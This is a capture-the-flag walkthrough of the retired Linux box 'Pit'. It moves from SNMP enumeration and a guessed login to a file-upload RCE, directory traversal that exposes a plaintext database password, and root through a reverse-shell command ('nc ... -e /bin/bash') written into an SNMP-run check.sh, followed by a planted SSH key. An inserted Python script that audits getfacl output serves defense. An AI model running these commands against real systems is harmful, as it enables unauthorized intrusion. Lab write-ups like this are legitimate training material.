Pit is a retired Linux machine, and the goal is to obtain the user and root flags by exploiting its vulnerabilities.
We start with an nmap scan to identify the target machine.
Classic Scan

Full Port Scan

The port scan shows the following open ports: 22/tcp ssh (OpenSSH), 80/tcp http (nginx 1.14), 9090/tcp ssl/zeus-admin and 161/udp snmp.
Here we came across the hostname dms-pit.htb and added it to the hosts file.

Next we perform SNMP enumeration:
nmap -A -sU -p161 -Pn

snmpwalk -v2c -c public .

The files listed here are notable.
Let's try to visit the one that sits in the html directory.
It redirected us to a login page.

We tried the default passwords here without success; since we had seen the user michelle, we tried that name as both the username and the password, and we were able to log in.

Here we continue enumerating.

Let's check searchsploit for a known vulnerability.

We found that there is an RCE vulnerability. Let's save the code given in the exploit as Shell.php and try to upload it.

Here we see that the document id is 29, which is what the fourth step of the exploit refers to.
Let's log in as

This way we read the passwd file. We then tried various ways to get a shell, but none of them worked, so we enumerate further through this url.

At ../../../../conf/settings.xml we find the settings.xml file.
Here we obtain credentials:

dbDriver="mysql" dbHostname="localhost" dbDatabase="seeddms" dbUser="seeddms" dbPass="ied^ieY6xoquu" doNotCheckVersion="false">
There was a login screen on port 9090; let's try logging in with this username and password.

Logging in with the seeddms username did not work, but with the user michelle
we unexpectedly got in.

We saw the terminal option at the bottom left.

Here we got the user flag, but we could not access the root directory, so we continue with local enumeration.

linpeas.sh gave us nothing, so let's look at the monitor file we saw in the snmpwalk output, /usr/bin/monitor.
When we looked at it, we could not see anything.
With ls -ld we saw that only root is allowed to access it.

With getfacl we displayed the owner, group and Access Control List (ACL).

Let's see whether we can write into it or not;

We can write into it.
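As an added defender-side check (not part of the original writeup): a small Python parser for getfacl output that lists every principal other than root with write access, applying the ACL mask the way the kernel does. The sample output below is constructed in getfacl's layout, not captured from the box; a directory that a root-run SNMP extend script reads from should produce an empty list here.

```python
# Constructed sample in getfacl's output layout (not captured from the box).
SAMPLE_GETFACL = """\
# file: usr/local/monitoring
# owner: root
# group: root
user::rwx
user:michelle:-wx
group::rwx
mask::rwx
other::---
"""


def parse_getfacl(text):
    """Return (owner, group, entries); each entry is (tag, qualifier, perms)."""
    owner = group = None
    entries = []
    for line in (l.strip() for l in text.splitlines()):
        if line.startswith("# owner:"):
            owner = line.split(":", 1)[1].strip()
        elif line.startswith("# group:"):
            group = line.split(":", 1)[1].strip()
        elif line and not line.startswith(("#", "default:")):
            # default: entries only shape newly created children, skip them
            tag, qualifier, perms = line.split(":")[:3]
            entries.append((tag, qualifier, perms))
    return owner, group, entries


def non_root_writers(text):
    """List every principal other than root that the ACL lets write."""
    owner, group, entries = parse_getfacl(text)
    mask = next((p for t, _, p in entries if t == "mask"), "rwx")
    findings = []
    for tag, qualifier, perms in entries:
        # The mask caps named users, named groups and the owning group, never user:: or other::.
        masked = (tag == "user" and qualifier) or tag == "group"
        eff = "".join(c if c in mask else "-" for c in perms) if masked else perms
        name = qualifier or (owner if tag == "user" else group)
        if "w" in eff and tag in ("user", "group") and name != "root":
            findings.append(f"{tag} {name}: {eff}")
        elif "w" in eff and tag == "other":
            findings.append(f"other: {eff}")
    return findings


if __name__ == "__main__":
    for finding in non_root_writers(SAMPLE_GETFACL):
        print("writable by non-root ->", finding)
```

Pipe real output into it with `getfacl /path | python3 audit.py` after replacing the constructed sample with `sys.stdin.read()`.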
Here, in place of check.sh, we make it give us a reverse shell:
echo "nc 4444 -e /bin/bash" > /usr/local/monitoring/check.sh

Then we listen with nc and trigger the snmp check so that it runs:
snmpwalk -m +MY-MIB -v2c -c public nsExtendObjects
We got command execution with root privileges as the user,
but it does not give any output here.

Here we hit a problem: the command we wrote gives no output, and when we tried for a reverse shell again it did not work either, so let's add the .pub key we created with ssh-keygen to root's .ssh folder.

Let's take this key and add it in the root terminal.

Then let's use this ssh key and get a shell.

We finally got our root flag
A difficult and challenging machine 🙂
